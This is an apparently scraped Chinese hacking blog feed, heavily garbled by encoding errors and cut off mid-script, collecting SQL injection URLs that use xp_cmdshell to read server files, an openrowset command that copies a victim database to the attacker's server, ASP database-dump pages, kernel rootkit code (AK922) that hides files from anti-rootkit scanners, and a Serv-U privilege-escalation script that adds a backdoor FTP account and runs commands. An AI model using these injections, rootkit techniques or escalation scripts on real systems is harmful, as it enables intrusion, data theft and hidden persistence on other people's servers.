http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?    接下来:(x)我们可以利用xp_availablemedia来获得当前所有驱动器,q存入temp表中Q?br>http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
?   我们可以通过查询temp的内Ҏ(gu)获得驱动器列表及(qing)相关信息或者利用xp_subdirs获得子目录列?q存入temp表中Q?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
?   我们q可以利用xp_dirtree获得所有子目录的目录树(wi)l构,q寸入temp表中Q?br>http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- q样可以成功的览到所有的目录Q文件夹Q列?br>?   如果我们需要查看某个文件的内容Q可以通过执行xp_cmdsellQ?insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
?   使用'bulk insert'语法可以一个文本文件插入到一个(f)时表中。如Qbulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'   览temp可以看到index.asp文g的内容了(jin)Q通过分析各种ASP文gQ可以得到大量系l信息,W(xu)EB与管理信息,甚至可以得到SA帐号的连接密码?br>
31、一些sql中的扩展存储的ȝ:
xp_availablemedia 昄pȝ上可用的盘符'C:\' xp_availablemedia
xp_enumgroups 列出当前pȝ的用群l及(qing)其说?xp_enumgroups
xp_enumdsn 列出pȝ上已l设|好的ODBC数据源名U?xp_enumdsn
xp_dirtree 昄某个目录下的子目录与文g架构 xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails 获取某文件的相关属?xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab 目标计机多个档案压羃到某个档案里所压羃的案都可以接在参数的后面用豆号隔开 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab 解压~?xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains 列出服务器域?xp_ntsec_enumdomains
xp_servicecontrol 停止或者启动某个服?xp_servicecontrol 'stop','schedule'
xp_terminate_process 用pid来停止某个执行中的程?xp_terminate_process 123
dbo.xp_subdirs 只列某个目录下的子目?dbo.xp_subdirs 'C:\'

32?br>USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
    end
/* Create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1。获得所有的存储q程的脚本:(x)
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2。获得所有的视图的脚本:(x)
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/

33、DB_OWNER权限下的数据库备份方?br>用openrowset吧。反q到自己的数据库机器Q~先在本地Z跟目标机器一L(fng)构的表~字段cd使用nvarchar.然后用vz连接对方的SQL数据库,在查询分析那里执?br>insert into OPENROWSET ('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;','select * from 你徏立的? select * from Ҏ(gu)的表?br>要是数据量太大的话就看看他数据库里有没有自动~号的字D?select * from 表名 where id>100
q样来弄?br>要是和W(xu)EB同台的话Q直接将库BAK到WEB目录下回来就O(jin)K啦。。。不q前提库不能太大Q超q?G的话SQLp时了(jin)
如果是SA权限可以利用下面的两个ASPE序来备份数据库Q?br>
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 数据库的备䆾与恢?lt;/TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
选择操作Q?lt;INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>备䆾</label> 
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>恢复</label>
<br>数据库名Q?lt;INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>文g路径Q?lt;INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(备䆾或恢复的文g路径,备䆾成EXE主要Z(jin)方便下蝲,zL..)<br>
<input type="submit" value="定">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql服务?br>sqlname = "sa" '用户?br>sqlpassword = "数据库密? '密码
sqlLoginTimeout = 15 '登陆时
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>备䆾成功!</font>"
elseif act = "restore" then
'恢复时要在没有用数据库时进行!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv

Response.write "<font color=green>恢复成功!</font>"
else
Response.write "<font color=red>没有选择操作</font>"
end if
end if
%>
</BODY>
</HTML>

sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>采飞扬ASP备䆾MSSQL数据库程?V1.0--QQ:79998575</title>
</head>
<style>
BODY {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   scrollbar-face-color:#E4E4F3;   scrollbar-highlight-color:#FFFFFF;   scrollbar-3dlight-color:#E4E4F3;   scrollbar-darkshadow-color:#9C9CD3;   scrollbar-shadow-color:#E4E4F3;   scrollbar-arrow-color:#4444B3;   scrollbar-track-color:#EFEFEF;}TABLE {   FONT-SIZE: 9pt;   FONT-FAMILY: "Courier New";   BORDER-COLLAPSE: collapse;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: solid;   border-right-style: none;   border-bottom-style: none;   border-left-style: solid;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.tr {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   text-align: center;}.td {   font-family: "Courier New";   font-size: 9pt;   background-color: #f9f9fd;}.warningColor {   font-family: "Courier New";   font-size: 9pt;   color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {   font-family: "Courier New";   BORDER-TOP-WIDTH: 1px;   BORDER-LEFT-WIDTH: 1px;   FONT-SIZE: 12px;   BORDER-BOTTOM-WIDTH: 1px;   BORDER-RIGHT-WIDTH: 1px;   color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   TEXT-DECORATION: none;}tr {   font-family: "Courier New";   font-size: 9pt;   line-height: 18px;}td {   font-family: "Courier New";   font-size: 9pt;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: none;   border-right-style: solid;   border-bottom-style: solid;   border-left-style: none;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.trHead {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   line-height: 3px;}.inputLogin {   font-family: "Courier New";   font-size: 9pt;   border: 1px solid #d8d8f0;   background-color: #f9f9fd;   vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飞扬ASP备䆾MSSQL数据库程?V1.0 </font></td>
</tr>
<tr>
<td>选择操作Q?br>  <input type="radio" name="act" id="act_backup"value="backup" />
  <label for=act_backup>备䆾</label>
  <input type="radio" name="act" id="act_restore" value="restore" />
  <label for=act_restore>恢复</label></td>
</tr>
<tr>
<td><label>SQL服务?
  <input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>用户?
  <input name="sqlname" type="text" value="sa" />
??
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>数据库名Q?br>  <input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>文g路径Q?br>  <input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(备䆾或恢复的文g路径)</td>
</tr>
<tr>
<td><% Response.write "本文件绝对\?" %>
  <font color="#FF0000">
  <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
  </font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="?? />
    <input name="Submit" type="reset" class="liuyes" size="10" value="?|? /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>提示信息:<%
if request("action")="" then  
response.write "<font color=#ff0000>不用我多说什么了(jin)吧!</font>"
end if
'SQL Server 数据库的备䆾与恢?
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>没有输入数据库名U?</font>"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action   = 0
bak.Initialize   = 1
'bak.Replace   = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>备䆾成功!</font>"
elseif act="restore" then
'恢复时要在没有用数据库时进行!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>恢复成功!</font>"
else
Response.write "<font color=red>请选择备䆾或恢?</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>

 



叶子 2007-10-22 09:41 发表评论
]]>AK922: H破盘?sh)񔋂(g)实现文仉?/title><link>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</link><dc:creator>叶子</dc:creator><author>叶子</author><pubDate>Fri, 12 Oct 2007 03:58:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/34018.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/34018.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/34018.html</trackback:ping><description><![CDATA[AK922: H破盘?sh)񔋂(g)实现文仉?br>作者:(x)Azy<br>email: Azy000@gmail.com<br>完成于:(x)2007-08-08<br><br>   目前Q一些已公开的主anti-rootkit(g)隐藏文件主要有两种Ҏ(gu)Q第一U是文gpȝ层的(g),属于q一cȝ有iceswordQdarkspyQgmer{。第二种便是盘U别的低U检(Disk Low-Level ScanningQ,属于q一cȝark也很多,典型代表为rootkit unhookerQfileregQis的插Ӟ(j)Qrootkit revealerQblacklight{。当?dng)q有一些工P它们在应用层上通过调用ZwQueryDirectoryFile来实施检?br>   驱动也好Q应用也|,说白?jin)就是直接或间接发送IRPC层驱动。第一cȝ发送到FSD中(fastfat.sys/ntfs.sysQ,W二c被发送到盘驱动Qdisk.sysQ,而后IRP便会(x)携带相应的文件信息返回,q时上层应用再根据返回信息进行处理和判断。但是由于DiskU比FSU更底层QIRPq回l我们的是更加接q数据原始组l方式的盘扇区信息Q所以在Disk层上实施文g(g)可以得到更令h信服的结果。但qƈ不等于说q类(g)不能被击|。本文就介l一U绕q该cL的实现Ҏ(gu)Q当?dng)q也是在AK922中用的?br>   对于要实现文仉藏的RKQ与其说?#8220;l过”Q还?sh)如说?#8220;拦截” -- 挂钩某些内核函数调用Q以便在q回上层之前我们有机?x)过滤掉待隐藏文件的信息?br>   AK922采用的方法是Hook内核函数IofCompleteRequest。这个函数很有意思,因ؓ(f)它不仅是一个几乎在M驱动中都要调用的函数Q而且参数中正好含有IRP。有?jin)IRPQ就有了(jin)一切。这些特性决定了(jin)它很适合做我们的“傀(g)?#8221;。但更重要的是,一般在驱动中调用IofCompleteRequest之时IRP操作都已完毕QIRP中相兛_已经填充?jin)内容,q就便于我们着手直接进行过滤而不用再做诸如发送IRP安装完成例程之类的操作?br>   下面q重说一下工作流E:(x)<br>   首先Q判断MajorFunction是不是IRP_MJ_READ以及(qing)IO堆栈中的DeviceObject是否是磁盘驱动的讑֤对象Q因才是我们要处理的核心(j)IRPQ所有ark直接发送到Disk层的IRP在这里都可以被拦截到?br>   接下来的处理要特别注意,q入到这里时IRQL是在APC_LEVEL以上的,因此我们不能?l)CQ何IRP中的用户模式~冲区,一极有可能蓝Q也是说我们不能直接处理相关磁盘扇Z息,而必通过ExQueueWorkItem排队一个WorkItem的方法来处理。除此之外,׃Disk层在讑֤堆栈中处于靠下的位置Q大部分IRP发到q里时当前进E上下文早已不是原始IRP发v者的q程上下文了(jin)Q这里的发v者应理解为arkq程。幸q的是在IRP的Tail.Overlay.Thread域中q(sh)存着原始ETHREAD指针Qؓ(f)?jin)操作用h式缓冲区Q必调用KeAttachProcess切到IRP发v者的上下文环境中Q而这个工作只能在处于PASSIVE_LEVELU上的工作者线E中执行。在DISPATCH_LEVELU上Q做的事少好?br>   刚开始我q分两种情况q行处理Q因为ƈ不是所有的IRP都不处在原始上下文中Q比如icesword发的IRP到这里还是处在icesword.exeq程中的Q这时我认ؓ(f)可以不用排队工作,q样可以节省很多系l资源,提高qo(h)效率。于是我试图在DISPATCH_LEVELU上直接操作用户~冲区,但这Ҏ(gu)行不通。驱动很不稳定,不一?x)就蓝?jin)。故索性老老实实地排队M(jin)Q然后再分情况处理。代码如下:(x)<br><br>// 处理Disk Low-Level Scanning<br>if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)<br>{    <br>        <br>    orgnThread = Irp->Tail.Overlay.Thread;<br>    orgnProcess = IoThreadToProcess(orgnThread);<br>        <br>    if(Irp->MdlAddress)<br>    {        <br>        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);<br>            <br>        // UserBuffer必须有效<br>        if(UserBuffer)<br>        {                    <br>            <br>            if(KeGetCurrentIrql() == DISPATCH_LEVEL)<br>            {                    <br>            <br>                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));<br>                <br>                WorkerCtx->UserBuffer = UserBuffer;<br>                WorkerCtx->Length = irpSp->Parameters.Read.Length;<br>                WorkerCtx->EProc = orgnProcess;<br>                <br>                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);<br>                                <br>                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);<br>            } <br>        }<br>        <br>    }<br>}<br>  <br><br>   来到工作者线E,C(jin)PASSIVE_LEVELU上Q切换上下文之后Q似乎安全多?jin)。但是以防万一Q操作用h式缓冲区之前q是要调用ProbeForXxx函数先判断一下。相关代码如下:(x)<br><br>VOID WorkerThread(PVOID Context)<br>{<br>    KIRQL irql;<br>    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;<br>    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;<br>    //PMDL mdl;<br>        <br><br>    if(((PWORKERCTX)Context)->UserBuffer)<br>    {<br>        if(eproc != currProc)<br>        {<br><br>            KeAttachProcess(eproc);<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){<br><br>                //DbgPrint("we can't op the buffer now :-(");<br>                KeDetachProcess();    <br>                return;<br>            }<br>            <br>            KeDetachProcess();    <br>            <br>        }else{<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){}<br>        }<br>    <br>    }<br>}<br><br>   准备工作l于是做得差不多了(jin)Q下面就开始真正涂改磁盘扇区内容了(jin)。这里将涉及(qing)到FAT32和NTFS盘文gl构Q我先把要用到的主要l构列出来,其余的大家可以参考《NTFS Documentation》?br><br>typedef struct _INDEX_HEADER{<br>    UCHAR            magic[4];<br>    USHORT            UpdateSequenceOffset;<br>    USHORT            SizeInWords;<br>    LARGE_INTEGER    LogFileSeqNumber;<br>    LARGE_INTEGER    VCN;<br>    ULONG            IndexEntryOffset;    // needed!<br>    ULONG            IndexEntrySize;<br>    ULONG            AllocateSize;<br>}INDEX_HEADER, *PINDEX_HEADER;<br><br><br>typedef struct _INDEX_ENTRY{<br>    LARGE_INTEGER        MFTReference;<br>    USHORT            Size;                // needed!<br>    USHORT            FileNameOffset;<br>    USHORT            Flags;<br>    USHORT            Padding;<br>    LARGE_INTEGER        MFTReferParent;<br>    LARGE_INTEGER        CreationTime;<br>    LARGE_INTEGER        ModifyTime;<br>    LARGE_INTEGER        FileRecModifyTime;<br>    LARGE_INTEGER        AccessTime;<br>    LARGE_INTEGER        AllocateSize;<br>    LARGE_INTEGER        RealSize;<br>    LARGE_INTEGER        FileFlags;<br>    UCHAR            FileNameLength;<br>    UCHAR            NameSpace;<br>    WCHAR            FileName[1];<br>}INDEX_ENTRY, *PINDEX_ENTRY;<br><br>   在读取磁盘文件信息时每次都是以一个扇区大(512 bytesQ的整数倍进行的Q如果不?jin)解相应L(fng)l织形式和数据结构,那么感觉是数据多而繁杂,搜烦(ch)效率也很低。但辅以上述l构便可快速定位待隐藏文gq进行涂攏V这里不得不说一句,法的高效是很重要的Q如果采用暴力搜索的方式Q那么系lBSOD的概率会(x)大大增加?br>   在FAT32卷上Q当AK922搜烦(ch)到文件AK922.sys的目录项Ӟ其0x0偏移处的文g名的W一个字节置?0xe5"Q即标记为删除。这样即可达到欺骗ark的目的。但Z(jin)更加隐蔽Q不让winhex察觉出来Q最好把文g名全部清0?br>   处理NTFSL(fng)微麻?ch)些Q文件记录和索引w要抹q净Q具体实现见代码Q这里不再赘q?br><br>VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)<br>{<br>    ULONG i;<br>    BOOLEAN bIsNtfsIndex;<br>    BOOLEAN bIsNtfsFile;<br>    ULONG offset = 0;<br>    ULONG indexSize = 0;<br>    PINDEX_ENTRY currIndxEntry = NULL;<br>    PINDEX_ENTRY preIndxEntry = NULL;<br>    ULONG currPosition;<br><br>    <br>    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);<br>    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);<br><br>    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)<br>    {            <br>    <br>        for(i = 0; i < BufLen/0x20; i++)<br>        {<br>            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))<br>            {<br><br>                *(PUCHAR)UserBuf        = 0xe5;<br>                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;<br><br>                break;<br>                    <br>            }<br><br>            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);<br>        <br>        }<br><br>    } else if(bIsNtfsFile) {<br><br>        //DbgPrint("FILE0...");<br><br>        for(i = 0; i < BufLen / FILERECORDSIZE; i++)<br>        {<br>            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))<br>            {<br>                memset((PVOID)UserBuf, 0, 0x4);<br>                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);<br>                break;<br>            }<br>                <br>            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);<br>                <br>        }<br>            <br>    } else if(bIsNtfsIndex) {<br>                            <br>        //DbgPrint("INDX...");<br>        // Index Entries<br>        <br>        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;<br>        indexSize = BufLen - offset;<br>        currPosition = 0;<br><br>        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);<br>        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);<br>                <br>        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)<br>        {<br>            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))<br>            {<br>                memset((PVOID)currIndxEntry->FileName, 0, 18);<br><br>                if(currPosition == 0)<br>                {<br>                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;<br>                    break;<br>                }<br><br>                preIndxEntry->Size += currIndxEntry->Size;<br>                <br>                break;<br>            }<br><br>            currPosition += currIndxEntry->Size;<br>            preIndxEntry = currIndxEntry;<br>            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);<br>                    <br>        }<br>    }<br>}<br><br>   水^有限Q欢q大家与我交?br><br><br>参考资料:(x)<br><br>[1] - 《NTFS Documentation?br>[2] - AzyQ《IceSword & Rootkit Unhooker驱动析?br><br>---------<br><br>关于AK922(AzyKit)Q我写的一个只实现文g隐藏的RKQ可以bypass本文提到的所有ark?br>Download @ <a target=_blank><u><font color=#0000ff>http://www.wiiupload.net/sf/65b4e75ec4</font></u></a> <img src ="http://www.shnenglu.com/elva/aggbug/34018.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">叶子</a> 2007-10-12 11:58 <a href="http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>分nserv-u利用脚本(asp/aspx/php/perl)http://www.shnenglu.com/elva/archive/2007/08/04/29350.html叶子叶子Sat, 04 Aug 2007 07:17:00 GMThttp://www.shnenglu.com/elva/archive/2007/08/04/29350.htmlhttp://www.shnenglu.com/elva/comments/29350.htmlhttp://www.shnenglu.com/elva/archive/2007/08/04/29350.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/29350.htmlhttp://www.shnenglu.com/elva/services/trackbacks/29350.htmlASP


<%
'Serv-U asp 提权E序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>正在q接 127.0.0.1:<%=port%>,使用用户? <%=user%>,口o(h)Q?lt;%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>正在提升权限,L(fng)?..,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
